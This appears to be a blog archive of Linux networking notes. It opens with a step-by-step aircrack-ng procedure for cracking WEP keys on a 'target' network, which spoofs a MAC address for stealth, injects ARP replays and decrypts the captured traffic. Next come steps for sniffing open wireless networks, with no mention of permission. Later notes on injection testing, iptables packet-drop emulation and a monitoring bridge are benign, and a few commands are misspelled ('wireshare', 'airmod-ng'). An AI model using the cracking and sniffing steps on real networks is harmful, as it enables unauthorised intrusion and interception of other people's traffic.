Category Archives: Linux General

Notes which apply to all flavours of Linux systems

Breaking WEP Encryption

Using Debian Wheezy (testing) with a Intel Corporation Centrino Wireless-N 1000 card…

    1. Stop network manager: /etc/init.d/network-manager stop
    2. Enter monitor mode: airmon-ng start wlan0
    3. Find nearby networks: airodump-ng mon0
    4. Identify the target BSSID, SSID and Channel number (-c option below)
    5. Start packet capture and leave running: airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w capturefile mon0
    6. Run the following two commands at the same time in separate windows (-h changes our source address, to add some stealth)
      1. aireplay-ng --fakeauth 40 -a 00:11:22:33:44:55 -h 01:12:34:56:67:89 --ignore-negative-one mon0
      2. aireplay-ng --arpreplay -x 20 -b 00:11:22:33:44:55 -h 01:12:34:56:67:89 --ignore-negative-one -e SSID mon0
      3. when this sees an ARP packet, it will go like crazy injecting packets and you will see the "#Data" rapidly increasing in the airodump-ng window
    7. After collecting 30,000 packets (you may leave airodump-ng running): aircrack-ng -1 capturefile.cap
    8. The WEP key should then be displayed in the terminal window.
    9. The collected packet trace may be decrypted with: airdecap-ng -w $wep_key_hex capturefile.cap
    10. Exit monitor mode: airmon-ng stop mon0

Open Wireless Network Packet Sniffing

This is easier and more effective than packet sniffing on a wired network:

  1. Stop Network Manager: /etc/init.d/network-manager stop
  2. Set your WiFi card into monitoring mode: airmon-ng start wlan0
  3. See what’s around: airodump-ng mon0
  4. Select a target network, and note the BSSID value and channel (used as ‘-c‘ option below)
  5. Collect the packet trace: airodump-ng -c 6 --bssid 00:12:34:56:78:90 -w output-file mon0
  6. Examine packet trace: wireshare output-file.cap

(run on Debian Wheezy [testing] using Intel Corporation Centrino Wireless-N 1000)

WiFi Card – Packet Injection in Linux

Very simple way to test if your WiFi card supports injection:

Stop Network Manager: /etc/init.d/network-manager stop
Put the card in monitor mode: airmod-ng start wlan0
Test using: aireplay-ng -9 mon0

With luck, the following output is displayed:
Trying broadcast probe requests…
Injection is working!

I am using Debian Wheezy (testing) with WiFi card:
Network controller: Intel Corporation Centrino Wireless-N 1000

Emulating a network connection with packet drop

IP packet drop can be easily emulated on any section of network using a Linux Bridge and a single iptables command:

iptables -t mangle -A FORWARD -m statistic --mode random --probability 0.01 -j DROP

(where probability is expressed as a value between 0 and 1)

If the intention is to emulate packet drop to the local Linux system not using a bridge, use the INPUT chain:

iptables -t mangle -A INPUT -m statistic --mode random --probability 0.01 -j DROP

To remove the random packet drop and restore the connection to normal operation either change -A to -D in the above commands, or flush the iptables with:
iptables -t mangle -F FORWARD or iptables -t mangle -F INPUT

Linux Networking Bridge

It is often useful to place a Linux system on a specific network cable, to packet sniff or modify the network behaviour. The network setup:

[switch] - ethernet cable - [node]

becomes:

[switch] - ethernet cable - [[Linux Bridge]] - ethernet cable - [node]

The only requirement for the Linux Bridge is two physical network interfaces and root access.

Important: stop Network Manager
/etc/init.d/network-manager stop

As root, setup the bridge with the commands below:

brctl addbr br0
brctl addif br0 eth0
brctl addif br0 eth1
echo 1 > /proc/sys/net/ipv4/ip_forward
ifconfig eth0 up
ifconfig eth1 up
ifconfig br0 up

-

The Linux Bridge Interface (br0) does not require an IP address, and no configuration changes are required on the network.

Using tcpdump or wireshark on the Linux Bridge (br0), it is possible to monitor all network traffic going to or from the network node. Using tc and iptables network traffic may be manipulated to facilitate testing.